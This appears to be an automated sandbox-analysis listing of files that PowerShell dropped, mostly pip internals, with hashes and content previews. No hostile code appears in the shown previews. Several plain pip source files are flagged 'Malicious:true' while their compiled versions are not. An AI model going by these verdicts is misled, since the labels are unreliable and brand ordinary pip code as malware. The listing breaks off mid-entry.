                                                                                                                                                                                                                              MD5:57643E39E9BEAD03959551514E6F3875
                                                                                                                                                                                                                              SHA1:E4BE4EDA98BA27D8EDC28ECD343E98A063F60467
                                                                                                                                                                                                                              SHA-256:F534601941A2A5ADD469D1FC5C7290A9A06B91A70C10A5157AC73352A5424EB3
                                                                                                                                                                                                                              SHA-512:A17C50ACBD69DFBB819A4F27FBA7A71E487AEB1566E07F3CD18BE5A866FFEBBDE20ABFA88FA0944E364C9B9BF7C2C40456EA01DF3BB62970033CA0CA372A8709
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf..........................>.....d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.e.........Z.y.)......)...parse)...Link)...KeyBasedCompareMixinc.....................T.......e.Z.d.Z.d.Z.g.d...Z.d.e.d.e.d.e.d.d.f...f.d...Z.d.e.f.d...Z.d.e.f.d...Z...x.Z.S.)...InstallationCandidatez4Represents a potential "candidate" for installation.....name..version..linkr....r....r......returnNc............................|.|._.........t.........|.........|._.........|.|._.........t...........|.....|.j...................|.j...................|.j...................f.t.....................y.).N)...key..defining_class).r......parse_versionr....r......super..__init__r....)...selfr....r....r......__class__s.... ..OC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_internal/models/candidate.pyr....z.InstallationCandidate.__init__....sH...............$.W..-...........................D.L.L.$.).)..4..0...............c.....................d.....d.j...................|.j...................|.j.........
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11181
                                                                                                                                                                                                                              Entropy (8bit):5.123166771956127
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:/GHHqI60W5moPAf0rJbANNiIMtCf2tE7cit+Gqyzm:/GHHqP0WEoYf0rJbAjf2Fit32
                                                                                                                                                                                                                              MD5:4A197A6CA598757D5692FCD5021EDE62
                                                                                                                                                                                                                              SHA1:B1D5BBBB9CF3ED9B365B739E213C3DC8912BBDE7
                                                                                                                                                                                                                              SHA-256:B46B4C577173931D8DC11AACD2408408E63F8154E62ED59719EC252B955CD037
                                                                                                                                                                                                                              SHA-512:99F5E3E8133D3C183C8FF6E0B93C82279C3B04B0FCD7D1DB3C35CCFDA3F0AF9D975AD832D26106E2377F3CE833B42A5E27B49CBEB6E10CAA7E370002B064B298
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf...............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...g.d...Z...e.d.........Z.d.Z...e.j ..................d.........Z...G.d...d.e.........Z...d.d.e.e.e.f.....d.e.e.....d.e.d.e.e.....d.e.e.....f.d...Z...d.d.e.e.e.f.....d.e.e.....d.e.d.e.e.....d.e.f.d...Z.d.e.e.d.........d.d.f.d...Z.d.e.d.e.e.e.f.....f.d...Z...G.d...d.........Z...G.d...d.........Z...G.d...d.........Z.e.e.e.e.f.....Z...G.d...d.........Z.y.).z. PEP 610 .....N)...Any..Dict..Iterable..Optional..Type..TypeVar..Union)...DirectUrl..DirectUrlValidationError..DirInfo..ArchiveInfo..VcsInfo..Tz.direct_url.jsonz.^\$\{[A-Za-z0-9-_]+\}(:\$\{[A-Za-z0-9-_]+\})?$c...........................e.Z.d.Z.y.).r....N)...__name__..__module__..__qualname__........PC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_internal/models/direct_url.pyr....r........s.........r....r......d..expected_type..key..default..returnc.....................\.....|.|.v.r.|.S.|.|.....}.t.........|.|.........s.t......
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4209
                                                                                                                                                                                                                              Entropy (8bit):5.222503442805574
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:NZ0okXDtZL9ywUxctMo3cNw+n7P6WYmWp:LvkXDtZLUwUW62T+jDW
                                                                                                                                                                                                                              MD5:8F56D06CCC9AD1A0F35C2DDF14814086
                                                                                                                                                                                                                              SHA1:AA5D80F82BA6CD755FD5DB7ADF39101C4C23047D
                                                                                                                                                                                                                              SHA-256:FBACB6672C19B3F93C716967A320C3FAE0C03E7BDC3070C485849672F3D45912
                                                                                                                                                                                                                              SHA-512:710222A16E3A120E0F55B9C7D5B7A6E81C528B166E4F014783693C09F792491D1F554CADCA807B62C9D93A5A33C6B71C9660F8F855C9701EE450579C83974762
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf..........................D.....d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.........Z.y.)......)...FrozenSet..Optional..Set)...canonicalize_name)...CommandErrorc..........................e.Z.d.Z.d.Z.d.d.g.Z.....d.d.e.e.e.........d.e.e.e.........d.d.f.d...Z.d.e.d.e.f.d...Z.d.e.f.d...Z.e.d.e.d.e.e.....d.e.e.....d.d.f.d...........Z.d.e.d.e.e.....f.d...Z.d.d...Z.y.)...FormatControlzBHelper for managing formats from which a package can be installed...no_binary..only_binaryN..returnc.....................P.....|...t.................}.|...t.................}.|.|._.........|.|._.........y...N)...setr....r....)...selfr....r....s.... .TC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_internal/models/format_control.py..__init__z.FormatControl.__init__....s-...................I..........%.K.."......&............otherc..............................t.............j...........................s.t.........S...j.....................j...................k7..r.y.t.............f.d.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1676
                                                                                                                                                                                                                              Entropy (8bit):5.140220186489793
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:c+7U1jaofQjeJEfx886x8wA0q7o5BZYj8V4:c6uakQjGwxH6x8whP58v
                                                                                                                                                                                                                              MD5:37D5FE1810D77AFA504D6D7390521146
                                                                                                                                                                                                                              SHA1:8567B09DA51641AA6AAF401ABB31AC34BB460FB7
                                                                                                                                                                                                                              SHA-256:E33A0445AB5B8E15EFE52DE5E139FBA435B7CACADD86DD1D8D9F91E426A20C9F
                                                                                                                                                                                                                              SHA-512:04B45AC4DEE8A8EBDD47DBFDD66E6AB5961E213D9A209E2A9726D345713E7F34388A7B93ECF64CAC778653703662EDBA5AD7BA224CDA8E19365728FE6318DA9C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf..........................H.....d.d.l.Z...G.d...d.........Z...e.d.d...........Z...e.d.d...........Z.y.)......Nc.....................H.......e.Z.d.Z.d.Z.g.d...Z.d.e.d.e.d.d.f...f.d...Z.d.e.d.e.f.d...Z...x.Z.S.)...PackageIndexzBRepresents a Package Index and provides easier access to endpoints)...url..netloc..simple_url..pypi_url..file_storage_domainr....r......returnNc.............................t...........|...............|.|._.........t.........j...................j...................|.........j...................|._.........|.j...................d.........|._.........|.j...................d.........|._.........|.|._.........y.).N..simple..pypi)...super..__init__r......urllib..parse..urlsplitr......_url_for_pathr....r....r....)...selfr....r......__class__s.... ..KC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_internal/models/index.pyr....z.PackageIndex.__init__....s_............................l.l..+..+.C..0..7..7.........,..,.X..6.........*..*.6..2.......$7.... ...
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2254
                                                                                                                                                                                                                              Entropy (8bit):5.205291472279888
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:fY/mKpXEhu6Y0RU1vEmFqLaGPpvhzRwLIWQGSKHOT8Dd43Zz7gsS:zhhDU1vKaMh1wEWQGshE
                                                                                                                                                                                                                              MD5:CEC64863936E517047B11612D5C38C3B
                                                                                                                                                                                                                              SHA1:3DBDAA7971321F25D052C5BAE2F62E5C3691DE9F
                                                                                                                                                                                                                              SHA-256:EAB2F3EB106AA4C2E0CCF336059C070E506B2886F9C0B008829E16718E7C32CF
                                                                                                                                                                                                                              SHA-512:3CC8FA45D80130DDA42C2F76DA06AA4979C9E3A0BEA816737906511C25FC60991EEF678585D96D8F4162D9981E984A48FAD94C70E087EF86DF97B53A9543F428
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf..........................P.....d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.........Z.y.)......)...Any..Dict..Sequence)...default_environment)...__version__)...InstallRequirementc.....................X.....e.Z.d.Z.d.e.e.....f.d...Z.e.d.e.d.e.e.e.f.....f.d...........Z.d.e.e.e.f.....f.d...Z.y.)...InstallationReport..install_requirementsc...........................|.|._.........y.).N)..._install_requirements)...selfr....s.... .YC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_internal/models/installation_report.py..__init__z.InstallationReport.__init__....s.......%9....".......ireq..returnc.....................n.....|.j...................s.J.d.|...............|.j...................j...........................|.j...................|.j...................r.|.j...................j...................n.d.|.j...................|.j...........................j...................d...}.|.j...................r$|.j...................r.t.........|.j.................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):25984
                                                                                                                                                                                                                              Entropy (8bit):5.3336712004037
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:PNqtIOjgxGjlTN2yEARn3AXb74U10iXyZi617+mRVH4aIZT3QtL8CmVC3:mIUgkjJVEARnQXbEU10l15ROaIZzQtIA
                                                                                                                                                                                                                              MD5:B1005A8CD155C82DF44DA4A39B4881B9
                                                                                                                                                                                                                              SHA1:39EFBF06261E633A49236B8734F326AA6F7DDDCE
                                                                                                                                                                                                                              SHA-256:C0CAD84451ACD27766D94B66B70F5B4CBBC91B9D0B6C35A91EA0E058FF3780FA
                                                                                                                                                                                                                              SHA-512:861C0E2DF77F4426E33F61795FE9325251B6151FFDDF90131A4DA69A5773A48DB757ACE3A797559EFE3E32CCE4D0D398A33FA4F52FCB72C7CA50C9DE0B77981F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf)Q.............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m Z ..d.d.l!m"Z"m#Z#..e.r.d.d.l$m%Z%....e.jL..................e'........Z(d.Z)..e.d.............G.d...d.................Z*..e.d.............G.d...d.................Z+d.e.e.e,e,f.........d.e.e.e,e,f.........f.d...Z-d.e,d.e,f.d...Z.d.e,d.e,f.d...Z/..e.j`..................d.e.jb..........................Z2d.e,d.e3d.e,f.d...Z4d.e,d.e,f.d...Z5..G.d...d.e ........Z6..G.d ..d!e.........Z7d"e6d.e7f.d#..Z8..e.jr..................d..$........d%e6d&e6d.e3f.d'..........Z:y.)(.....N)...dataclass)...TYPE_CHECKING..Any..Dict..List..Mapping..NamedTuple..Optional..Tuple..Union)...deprecated)...WHEEL_EXTENSION)...Hashes)...pairwise..redact_auth_from_url..split_auth_from_netloc..splitext)...KeyBasedCompareMixin)...path_to_url..url_to_path)...IndexContent)...sha512..sha384..sha256..sha22
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1151
                                                                                                                                                                                                                              Entropy (8bit):5.344826151631578
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:BCmaThRLwHUp/tlt2FCry16xOpm6OKKNnt/iRBmRRD/hoKhklRT:AmAhRLw0p/tQCWm96SFiRiRbhrsT
                                                                                                                                                                                                                              MD5:99F689166117A9905B91E9C538C3D1C2
                                                                                                                                                                                                                              SHA1:13F209A15D36C1752CB684A40C05BC152D3899D7
                                                                                                                                                                                                                              SHA-256:639A29611B2C3524942402BE4043F594F06B1F08FE4A89292967285743AD5330
                                                                                                                                                                                                                              SHA-512:902B04AA9325A33AF564AAB6EE6F8256F83593D9854825EC67F54BB5F8C8BB3314FCB5C638F1FD63F7FD76E8658799964D2F0CF22F736A71E7E9DC8A6A676177
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf..........................$.....d.Z.g.d...Z...G.d...d.........Z.y.).z..For types associated with installation schemes...For a general overview of available schemes and their context, see.https://docs.python.org/3/install/index.html#alternate-installation......platlib..purelib..headers..scripts..datac.....................4.....e.Z.d.Z.d.Z.e.Z.d.e.d.e.d.e.d.e.d.e.d.d.f.d...Z.y.)...SchemeztA Scheme holds paths which are used as the base directories for. artifacts associated with a Python package.. r....r....r....r....r......returnNc.....................J.....|.|._.........|.|._.........|.|._.........|.|._.........|.|._.........y.).Nr....)...selfr....r....r....r....r....s.... .LC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_internal/models/scheme.py..__init__z.Scheme.__init__....s'...............................................)...__name__..__module__..__qualname__..__doc__..SCHEME_KEYS..__slots__..strr......r....r....r....r........sM................I............
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5070
                                                                                                                                                                                                                              Entropy (8bit):5.303072518911973
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:UkVEGeVpdcT8SQ3ZgilOrmc1rfQyXsPlN24lUz:XVE3NcT8jSVrmsrfQFNdUz
                                                                                                                                                                                                                              MD5:97910921BE959867E0456C33367CD998
                                                                                                                                                                                                                              SHA1:4BBFED8F187A9492B5D1B6E0B66D66439C080383
                                                                                                                                                                                                                              SHA-256:BD5A761C8567080A09A79DCAA2D37E9AE0E487A8C61D592E7D0147C520022908
                                                                                                                                                                                                                              SHA-512:F25C47854C460FF3D6A79174B9FA57BDEA18B63225BE2E332E01095B2741E27479DA1D6C2EF99EC91990E24461581DB05E67D4E6FBA0B6B90FCCDE9802E9C295
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf#..............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.....e.j"..................e.........Z...G.d...d.........Z.y.)......N)...List)...canonicalize_name)...PyPI)...has_tls)...normalize_path..redact_auth_from_urlc..........................e.Z.d.Z.d.Z.g.d...Z.e.d.e.e.....d.e.e.....d.e.d.d.f.d...........Z.d.e.e.....d.e.e.....d.e.d.d.f.d...Z.d.e.f.d...Z.d.e.d.e.e.....f.d...Z.y.)...SearchScopezF. Encapsulates the locations that pip is configured to search.. ....find_links..index_urls..no_indexr....r....r......returnc..........................g.}.|.D.]P..}.|.j...................d.........r,t.........|.........}.t.........j...................j...................|.........r.|.}.|.j...................|............R..t.................s`t.........j...................|.|.........D.]G..}.t.........j...................j...................|.........}.|.j...................d.k(..s..2t.........j.........
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1833
                                                                                                                                                                                                                              Entropy (8bit):5.36350581537501
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:vRybOqWwftwOBQ8GYLJ/QoRI8abkJ4eMQKuIgrGIpshf/PgS08UZzKNn9Lh0QREA:vPitTu43ekdze/DzUe9F0iAfFuiS/Vi0
                                                                                                                                                                                                                              MD5:0DCE12A5771779A312E131BBCD778E05
                                                                                                                                                                                                                              SHA1:DD367E0BC481FCBA4701F22EF0BF25529F3AF4C4
                                                                                                                                                                                                                              SHA-256:45FB372BB8E765A40F2B60E3B389D062BFA8D1B862C7FB2AB8DE8FDFE39B1852
                                                                                                                                                                                                                              SHA-512:F91C5FA2C25FD8FFC89B079EA8AD2248A6B60AD41D30BEBADAE364D71DCF1ED14C68EBAFFCAE4D5ADF486B521B99921A48F386EFEDB2F540EBF9A7052B19BBBB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vfs.........................0.....d.d.l.m.Z...d.d.l.m.Z.....G.d...d.........Z.y.)......)...Optional)...FormatControlc.....................N.....e.Z.d.Z.d.Z.g.d...Z.........d.d.e.d.e.d.e.e.....d.e.d.e.e.....d.d.f.d...Z.y.)...SelectionPreferenceszd. Encapsulates the candidate selection preferences for downloading. and installing files.. ....allow_yanked..allow_all_prereleases..format_control..prefer_binary..ignore_requires_pythonNr....r....r....r....r......returnc.....................R.....|...d.}.|.|._.........|.|._.........|.|._.........|.|._.........|.|._.........y.).aw...Create a SelectionPreferences object... :param allow_yanked: Whether files marked as yanked (in the sense. of PEP 592) are permitted to be candidates for install.. :param format_control: A FormatControl object or None. Used to control. the selection of source packages / binary packages when consulting. the index and links.. :param prefer_binary:
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4936
                                                                                                                                                                                                                              Entropy (8bit):5.380783798592407
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:Z3AIuKf+/statQpclT9YkNcibB07BCjYf9KecqNna:ZQIP+6l23Yk6it0kYfDna
                                                                                                                                                                                                                              MD5:B50ED0D1D528E90357289BCB9FC81C77
                                                                                                                                                                                                                              SHA1:1D44181BF4CBE785FD9BA56A2C260A20896A02AA
                                                                                                                                                                                                                              SHA-256:AB95983155316E0B51844C6A503847277409408BA0E050305EEBD9BC46C46AF8
                                                                                                                                                                                                                              SHA-512:2DED59241F26282827196DD04EE0488A31ED482FF368E2DCF43545EDA52C2A959A7952889574823A7B4ADD07C4864E428C7F982065E4A5D3DF4B1A1DA691C45C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf..........................`.....d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.....G.d...d.........Z.y.)......N)...List..Optional..Set..Tuple)...Tag)...get_supported..version_info_to_nodot)...normalize_version_infoc..........................e.Z.d.Z.d.Z.g.d...Z.........d.d.e.e.e.........d.e.e.e.d.f.........d.e.e.e.........d.e.e.....d.d.f.d...Z.d.e.f.d...Z.d.e.e.....f.d...Z.d.e.e.....f.d...Z.y.)...TargetPythonzx. Encapsulates the properties of a Python interpreter one is targeting. for a package install, download, etc.. )..._given_py_version_info..abis..implementation..platforms..py_version..py_version_info.._valid_tags.._valid_tags_setNr....r.....r....r......returnc...........................|.|._.........|...t.........j...................d.d...}.n.t.........|.........}.d.j...................t.........t.........|.d.d...................}.|.|._.........|.|._.........|.|._.........|.|._.........|.|._.........d.|._.........d.|._.........y.).a<...
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5762
                                                                                                                                                                                                                              Entropy (8bit):5.451790373942727
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:pH5zh309UmKGhFT+p8NTyjK/GNLbcUGTm541Sp:pb309ULc8pEyjK/GRchT5O
                                                                                                                                                                                                                              MD5:11D5C2B31E327D93A29B8F5294D76CCB
                                                                                                                                                                                                                              SHA1:839534F0C444DA2235D8038E181C629E3709E8FA
                                                                                                                                                                                                                              SHA-256:64DCA13350E7A0708A6787927E3E358F4D2C418FA4807AC18B7595D74E94B1A2
                                                                                                                                                                                                                              SHA-512:3B966BC181BF72476C2DB3ACE08E78D6FF86DDEF1D8D65C2ADDDD63F7E6731EE21D1BDD3B88F1F4CB7C73AE80C387C0C1DED3B2982F9B36422B1260E3C33931B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf..........................P.....d.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.........Z.y.).z`Represents a wheel file and provides access to the various parts of the.name that have meaning.......N)...Dict..Iterable..List)...Tag)...InvalidWheelFilenamec..........................e.Z.d.Z.d.Z...e.j...................d.e.j...........................Z.d.e.d.d.f.d...Z.d.e.e.....f.d...Z.d.e.e.....d.e.f.d...Z.d.e.e.....d.e.e.e.f.....d.e.f.d...Z.d.e.e.....d.e.f.d...Z.y.)...Wheelz.A wheel filez.^(?P<namever>(?P<name>[^\s-]+?)-(?P<ver>[^\s-]*?)). ((-(?P<build>\d[^-]*?))?-(?P<pyver>[^\s-]+?)-(?P<abi>[^\s-]+?)-(?P<plat>[^\s-]+?). \.whl|\.dist-info)$..filename..returnNc..........................|.j...................j...................|.........}.|.s.t.........|...d.............|.|._.........|.j...................d.........j...................d.d.........|._.........|.j...................d.........j...................d.d.........|._.........|.j........
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):931
                                                                                                                                                                                                                              Entropy (8bit):4.47254445210143
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:1TLX4xHtjZk0reEeSErPYZAx07MSim0rcg0rvWbUaH:toN+0rehSEKg7E0rcg0r0UA
                                                                                                                                                                                                                              MD5:19D6ACE84BB3505BD0C0555DFCD2D7D8
                                                                                                                                                                                                                              SHA1:0F95933E28B70D16841D840B5025FE75F6264337
                                                                                                                                                                                                                              SHA-256:8443EEF15746139A95012BFABCBCFE47E460879FBB2CC6DA8B58E0B6130277C3
                                                                                                                                                                                                                              SHA-512:FC7AD543C2FAE0A914447564540F11B5E97F01E61D0160DFA054BDC1927C97F41A2A8992B2DD43D9CEBA9D8F7718D0CDD6FB21FEFD1BC758C0E580B7F21C77B4
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from pip._vendor.packaging.version import parse as parse_version..from pip._internal.models.link import Link.from pip._internal.utils.models import KeyBasedCompareMixin...class InstallationCandidate(KeyBasedCompareMixin):. """Represents a potential "candidate" for installation.""".. __slots__ = ["name", "version", "link"].. def __init__(self, name: str, version: str, link: Link) -> None:. self.name = name. self.version = parse_version(version). self.link = link.. super().__init__(. key=(self.name, self.version, self.link),. defining_class=InstallationCandidate,. ).. def __repr__(self) -> str:. return "<InstallationCandidate({!r}, {!r}, {!r})>".format(. self.name,. self.version,. self.link,. ).. def __str__(self) -> str:. return f"{self.name!r} candidate (version {self.version} at {self.link})".
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6889
                                                                                                                                                                                                                              Entropy (8bit):4.5391529804609565
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:bSpgC4yyRu1C4L9+xf2BOdcoedGIELmuP/1QtTOX3ijzL/hWLBRA2YnHS7X:bSpgC43ReC4LExfS6coedGIELmuPtR4w
                                                                                                                                                                                                                              MD5:85AE2D81EC82E83403CC20439739F1EF
                                                                                                                                                                                                                              SHA1:2BE67E05E637FC6DEFE87897294B4A61043223FF
                                                                                                                                                                                                                              SHA-256:170A2E60129CA9C921EC1FA4D87DC75604618454EE905C2A892DE47EFB452D29
                                                                                                                                                                                                                              SHA-512:A89929AE9F624C15143A15EEEE5A040EF47FFD2879CC20690538EFB71949E634E7F86A5EA45A5E27947B507AFEBCF49136E27DF76E03C96BF11374774803EB96
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:""" PEP 610 """.import json.import re.import urllib.parse.from typing import Any, Dict, Iterable, Optional, Type, TypeVar, Union..__all__ = [. "DirectUrl",. "DirectUrlValidationError",. "DirInfo",. "ArchiveInfo",. "VcsInfo",.]..T = TypeVar("T")..DIRECT_URL_METADATA_NAME = "direct_url.json".ENV_VAR_RE = re.compile(r"^\$\{[A-Za-z0-9-_]+\}(:\$\{[A-Za-z0-9-_]+\})?$")...class DirectUrlValidationError(Exception):. pass...def _get(. d: Dict[str, Any], expected_type: Type[T], key: str, default: Optional[T] = None.) -> Optional[T]:. """Get value from dictionary and verify expected type.""". if key not in d:. return default. value = d[key]. if not isinstance(value, expected_type):. raise DirectUrlValidationError(. f"{value!r} has unexpected type for {key} (expected {expected_type})". ). return value...def _get_required(. d: Dict[str, Any], expected_type: Type[T], key: str, default: Optional[T] = None.) -> T:. value = _get(
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2486
                                                                                                                                                                                                                              Entropy (8bit):4.3270582835610565
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:FFgUsUhREjmTCXrEVvRdeh4D003/Y4/kkaHyron2DlWU8lUJl:n7sIYPqDaHyg2DlWU8u
                                                                                                                                                                                                                              MD5:BDC269C3F40962AE622812360A68C3F3
                                                                                                                                                                                                                              SHA1:22CB3E5D1D2D4921C56BEE8B25322405D75660E6
                                                                                                                                                                                                                              SHA-256:C2DB10A922BD1DA522371404B81F82EB67958A6C3A1B8FD5405C55F7EFCA0C11
                                                                                                                                                                                                                              SHA-512:1C7F457CDD19975A0ABA60438CC5035F6FA7561B7B0339704AEF2F7FE55104F0CFF8EC66B61BFF74BD7CBEBF3F6DF8CFB89D230775B4B3258F51E729BBDB0767
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from typing import FrozenSet, Optional, Set..from pip._vendor.packaging.utils import canonicalize_name..from pip._internal.exceptions import CommandError...class FormatControl:. """Helper for managing formats from which a package can be installed.""".. __slots__ = ["no_binary", "only_binary"].. def __init__(. self,. no_binary: Optional[Set[str]] = None,. only_binary: Optional[Set[str]] = None,. ) -> None:. if no_binary is None:. no_binary = set(). if only_binary is None:. only_binary = set().. self.no_binary = no_binary. self.only_binary = only_binary.. def __eq__(self, other: object) -> bool:. if not isinstance(other, self.__class__):. return NotImplemented.. if self.__slots__ != other.__slots__:. return False.. return all(getattr(self, k) == getattr(other, k) for k in self.__slots__).. def __repr__(self) -> str:. return f"{self.__class__.__name__}
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1030
                                                                                                                                                                                                                              Entropy (8bit):4.660446953045376
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:yTrPnCsK6Xlr4n7AizUQ+J/nICn8liQ2koAb911i7k2bPUMHN:yTrQ6XQZQQm78ktkoAb9O7J5t
                                                                                                                                                                                                                              MD5:F67480DB56CF588A2EE92844959BBABF
                                                                                                                                                                                                                              SHA1:26707B880BF178100E5A233E43832C57A4916895
                                                                                                                                                                                                                              SHA-256:B589CBF28C468B8692356BABD261BC0C03FBAC2EB2BA16BF33024EF31C3472B2
                                                                                                                                                                                                                              SHA-512:F8BEB8F1B1AC8A8AD038D04F1A3211A316851922083F28612F86F8CEB611354BD008F5253F8C322862894DE78BA1636BA0D4277DD20C813F043FEA0F10DC3A84
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:import urllib.parse...class PackageIndex:. """Represents a Package Index and provides easier access to endpoints""".. __slots__ = ["url", "netloc", "simple_url", "pypi_url", "file_storage_domain"].. def __init__(self, url: str, file_storage_domain: str) -> None:. super().__init__(). self.url = url. self.netloc = urllib.parse.urlsplit(url).netloc. self.simple_url = self._url_for_path("simple"). self.pypi_url = self._url_for_path("pypi").. # This is part of a temporary hack used to block installs of PyPI. # packages which depend on external urls only necessary until PyPI can. # block such packages themselves. self.file_storage_domain = file_storage_domain.. def _url_for_path(self, path: str) -> str:. return urllib.parse.urljoin(self.url, path)...PyPI = PackageIndex("https://pypi.org/", file_storage_domain="files.pythonhosted.org").TestPyPI = PackageIndex(. "https://test.pypi.org/", file_storage_domain="t
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2818
                                                                                                                                                                                                                              Entropy (8bit):4.461309983570084
                                                                                                                                                                                                                              Encrypted:false
